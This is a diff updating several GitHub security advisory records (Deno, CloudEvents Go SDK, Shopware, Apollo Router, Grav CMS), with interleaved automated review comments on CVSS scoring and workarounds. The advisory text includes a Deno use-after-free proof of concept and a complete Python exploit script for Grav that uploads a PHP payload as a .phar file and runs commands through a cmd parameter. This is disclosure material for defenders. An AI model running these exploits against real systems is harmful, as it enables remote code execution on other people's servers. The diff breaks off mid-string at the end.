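Review bot: The second GHSA-g74q-5xw3-j7q9 hunk lowers `database_specific.severity` from `CRITICAL` to `HIGH` while the first hunk adds `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`, which scores 7.5, so the two fields now agree and the previous `CRITICAL` beside an empty `severity` array was the inconsistent state. What the hunk leaves unexplained is the provenance of the vector and of `CWE-400`: the unchanged context line `"nvd_published_at": null` sits right next to the edit, and if the vector was taken from NVD that timestamp should presumably be populated in the same change, whereas if it came from the CNA record the null is expected. The Microsoft advisory text in `details` does not quote a vector, so nothing visible here lets a reader audit the downgrade; naming the source in the commit, or adding a reference entry for the CNA/NVD record the score was copied from, would close that gap.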
@@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-3j27-563v-28wf", - "modified": "2024-03-06T17:04:40Z", + "modified": "2026-02-17T19:38:52Z", "published": "2024-03-06T17:04:29Z", "aliases": [ "CVE-2024-27934" ], "summary": "*const c_void / ExternalPointer unsoundness leading to use-after-free", - "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. 
Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. 
The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2\n", - "severity": [], + "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. 
`ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. 
We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2", + "severity": [ + { + 
"type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
"affected": [
{
"package": {
@@ -41,10 +46,12 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": "MODERATE",
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-03-06T17:04:29Z",
- "nvd_published_at": null
+ "nvd_published_at": "2024-03-21T02:52:22Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json
index b817c8d243bea..7a72186d272b4 100644
--- a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json
+++ b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json
@@ -1,14 +1,19 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5pf6-2qwx-pxm2",
- "modified": "2024-03-12T15:22:22Z",
+ "modified": "2026-02-17T19:40:16Z",
"published": "2024-03-06T20:11:59Z",
"aliases": [
"CVE-2024-28110"
],
"summary": "Go SDK for CloudEvents's use of WithRoundTripper to create a Client leaks credentials",
- "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
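Review bot: The added vector scores this with S:U, yet the details describe an attacker who already runs code inside the Deno runtime gaining `arbitrary code execution on the host machine regardless of permissions`; that is a crossing of the permission-sandbox boundary, and if the Deno permission model is treated as the security authority the stricter reading is S:C (which would push the rating to Critical), so the S:U choice deserves an explicit decision rather than a default. AV:L/PR:N does fit the stated precondition that the attacker controls the JavaScript being executed, and CWE-416 matches the close-twice-then-reclaim sequence in the PoC. The details also say `Affected versions of Deno is from 1.36.2 up to latest`, which is relative to the report date and will mislead once a fixed release exists; the `affected` range that should pin this is outside both hunks.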
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2\n", - "severity": [], + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
"affected": [
{
"package": {
@@ -52,8 +57,10 @@
}
],
"database_specific": {
- "cwe_ids": [],
- "severity": "MODERATE",
+ "cwe_ids": [
+ "CWE-522"
+ ],
+ "severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-03-06T20:11:59Z",
"nvd_published_at": "2024-03-06T22:15:57Z"
diff --git a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json
index 38ea09ccfe953..0d40371e3ebe4 100644
--- a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json
+++ b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json
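Review bot: The advisory now carries a C:H / CWE-522 rating but still offers no workaround for users who cannot move to v2.15.2, even though the quoted code shows one: `http.DefaultClient` is adopted only when `p.Client == nil`, so passing an explicit, dedicated `http.Client` (if the SDK exposes an option for it, which the snippet suggests but does not prove) keeps the authenticated transport off the process-wide default. A `### Workarounds` paragraph saying that would be worth adding, along with a remediation caveat that the bug mutates shared global state, so a process that has already executed the vulnerable path stays poisoned until restarted, not merely until the dependency is bumped. The CVSS choice of PR:N/AV:N reads correctly for a passive endpoint that simply receives the leaked Authorization header; the affected version range lies outside this hunk.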
@@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-c2f9-4jmm-v45m", - "modified": "2024-03-06T15:06:54Z", + "modified": "2026-02-17T22:02:24Z", "published": "2024-03-06T15:06:54Z", "aliases": [ "CVE-2024-27917" ], "summary": "Shopware's session is persistent in Cache for 404 pages", - "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.\n", - "severity": [], + "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. 
Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
"affected": [
{
"package": {
@@ -75,9 +80,9 @@
"cwe_ids": [
"CWE-524"
],
- "severity": "CRITICAL",
+ "severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-03-06T15:06:54Z",
- "nvd_published_at": null
+ "nvd_published_at": "2024-03-06T20:15:48Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json
index 392aeb4725b74..315f3eb069e6a 100644
--- a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json
+++ b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json
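Review bot: The new vector sets C:N, but the mechanism described is a cached 404 response that hands the same session cookie to every cookie-less visitor, so those visitors end up sharing one server-side session; the Consequences section mentions only logout and cart clearing, yet a shared guest session presumably also exposes one visitor's cart or other session-stored data to the next, which would make C:L the more defensible value and is worth confirming against Shopware's session handling before the score is finalized. The Redis workaround is framed as avoiding `the exploit code` rather than removing the cause (caching a response that carries `Set-Cookie`); a more general interim mitigation the advisory could name is to exclude responses with `Set-Cookie` from the HTTP cache at the reverse proxy or cache layer, which protects installations that cannot switch session handlers. CWE-524 and the CRITICAL-to-HIGH change are consistent with the 7.5 vector.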
@@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-cgqf-3cq5-wvcj", - "modified": "2024-03-06T18:24:17Z", + "modified": "2026-02-17T19:37:19Z", "published": "2024-03-06T18:24:17Z", "aliases": [ "CVE-2024-28101" ], "summary": "Apollo Router's Compressed Payloads do not respect HTTP Payload Limits", - "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size. \n", - "severity": [], + "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. 
\n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
"affected": [
{
"package": {
@@ -48,9 +53,9 @@
"cwe_ids": [
"CWE-409"
],
- "severity": "MODERATE",
+ "severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2024-03-06T18:24:17Z",
- "nvd_published_at": null
+ "nvd_published_at": "2024-03-21T02:52:23Z"
}
}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json
index cedc93372d406..d074f2bee2ed8 100644
--- a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json
+++ b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json
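Review bot: The Workarounds text recommends body-size limits at a proxy or load balancer, but the defect is that `limits.http_max_request_bytes` is checked only after decompression, so a front-end limit on the compressed body is a weak mitigation: a payload of a few kilobytes on the wire can still inflate to a large allocation inside the Router. The paragraph should state that the proxy must either reject or strip `Content-Encoding` on request bodies (forcing clients to send them uncompressed) or decompress the body itself and enforce the limit on the expanded size; an upload-size limit alone only bounds the wire size, which is exactly what the attacker controls cheaply. The added vector (A:H, 7.5) and CWE-409 match the described decompression-amplification behavior, and the MODERATE-to-HIGH label change follows from it.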
@@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-f6g2-h7qv-3m5v", - "modified": "2024-03-06T16:58:33Z", + "modified": "2026-02-17T19:39:34Z", "published": "2024-03-06T16:58:33Z", "aliases": [ "CVE-2024-27923" ], "summary": "Remote Code Execution by uploading a phar file using frontmatter", - "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. 
The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = 
BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D
=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 
'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution\n", - "severity": [], + "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video 